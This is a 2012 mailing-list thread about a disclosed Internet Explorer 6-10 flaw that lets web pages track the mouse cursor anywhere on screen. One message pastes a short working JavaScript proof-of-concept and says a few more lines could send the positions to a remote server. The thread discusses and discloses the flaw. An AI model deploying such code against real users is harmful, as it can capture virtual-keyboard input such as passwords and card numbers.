[dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)

Jim Lawrence accessd at shaw.ca
Thu Dec 13 21:41:08 CST 2012


Too bad.

Jim

-----Original Message-----
From: dba-tech-bounces at databaseadvisors.com
[mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
Andersen
Sent: Thursday, December 13, 2012 1:20 PM
To: Discussion of Hardware and Software issues
Subject: Re: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)


You can if you exit the Metro interface and run it as a desktop application.
As far as browsers go while in Metro, you only get IE.

This, of course, means that you are not able to run anything other than IE
on any Surface tablets running Windows RT.

- Hans



On 2012-12-13, at 12:58 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:

> I am being facetious. 
> 
> Only if you are running IE as your browser. One question comes to mind;
Can
> you use any other browser than IE on the new Win8 product line?
> 
> Jim
> 
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
> Andersen
> Sent: Thursday, December 13, 2012 12:37 PM
> To: Discussion of Hardware and Software issues
> Subject: Re: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
> 
> 
>> The choice now is either stop using all tablets and Smartphones or stop
>> using IE until a universal fix is built and distributed. Better safe than
>> sorry.
> 
> All tablets and smartphones?
> 
> - Hans
> 
> 
> 
> On 2012-12-13, at 12:32 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:
> 
>> You mean this demo?
>> 
>> <!DOCTYPE html>
>> <html>
>> <head>
>> <meta charset="utf-8" />
>> <title>Exploit Demo</title>
>> <script type="text/javascript">
>>   window.attachEvent("onload", function() {
>>     var detector = document.getElementById("detector");
>>     detector.attachEvent("onmousemove", function (e) {
>>       detector.innerHTML = e.screenX + ", " + e.screenY;
>>     });
>>     setInterval(function () {
>>       detector.fireEvent("onmousemove");
>>     }, 100);
>>   });
>> </script>
>> </head>
>> <body>
>> <div id="detector"></div>
>> </body>
>> </html>
>> 
>> These type of compromise should be out there so everyone knows them, as
> rest
>> assured, every person in the malware business is already fully versed in
>> this exploit. Really it is only four to five lines of code and not
>> particularly difficult code. You would have to add an AJAX piece of code
>> collect the positions remotely of course but that would also be less than
>> ten lines of additional code; four lines if you have attached the JQuery
>> library.
>> 
>> The choice now is either stop using all tablets and Smartphones or stop
>> using IE until a universal fix is built and distributed. Better safe than
>> sorry.
>> 
>> Jim
>> 
>> -----Original Message-----
>> From: dba-tech-bounces at databaseadvisors.com
>> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of
Hans-Christian
>> Andersen
>> Sent: Thursday, December 13, 2012 1:18 AM
>> To: Discussion of Hardware and Software issues
>> Subject: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
>> 
>> 
>> http://spider.io/blog/2012/12/internet-explorer-data-leakage/
>> 
>> This is a pretty severe security issue. All it takes is a little bit of
>> javascript on any site you visit and they are able to fully track where
> your
>> mouse is on your screen (even when IE is minimized). All versions of IE
> are
>> vulnerable to this starting from IE 6. It's already being exploited in
the
>> wild.
>> 
>> There is a demo included as a link, if you want to test this out
yourself.
>> 
>> - Hans
>> 
>> 
>> Excerpt from link:
>> _______________
>> 
>> "On the 1st of October, 2012, we disclosed to Microsoft the following
>> security vulnerability in Internet Explorer, versions 6-10, which allows
>> your mouse cursor to be tracked anywhere on the screen-even if the
> Internet
>> Explorer window is minimised. The vulnerability is particularly troubling
>> because it compromises the security of virtual keyboards and virtual
>> keypads.
>> 
>> The motivation for using a virtual keyboard is typically that it reduces
> the
>> chance of a keylogger recording one's keypresses and thereby compromising
>> one's passwords or credit card details. (c.f. bit.ly/YnNBYE;
> bit.ly/VpapWf)
>> 
>> Whilst the Microsoft Security Research Center has acknowledged the
>> vulnerability in Internet Explorer, they have also stated that there are
> no
>> immediate plans to patch this vulnerability in existing versions of the
>> browser. It is important for users of Internet Explorer to be made aware
> of
>> this vulnerability and its implications.
>> 
>> The vulnerability is already being exploited by at least two display ad
>> analytics companies across billions of page impressions per month."
>> 
>> 
>> _______________________________________________
>> dba-Tech mailing list
>> dba-Tech at databaseadvisors.com
>> http://databaseadvisors.com/mailman/listinfo/dba-tech
>> Website: http://www.databaseadvisors.com
>> 
>> _______________________________________________
>> dba-Tech mailing list
>> dba-Tech at databaseadvisors.com
>> http://databaseadvisors.com/mailman/listinfo/dba-tech
>> Website: http://www.databaseadvisors.com
> 
> 
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
> 
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com


_______________________________________________
dba-Tech mailing list
dba-Tech at databaseadvisors.com
http://databaseadvisors.com/mailman/listinfo/dba-tech
Website: http://www.databaseadvisors.com



More information about the dba-Tech mailing list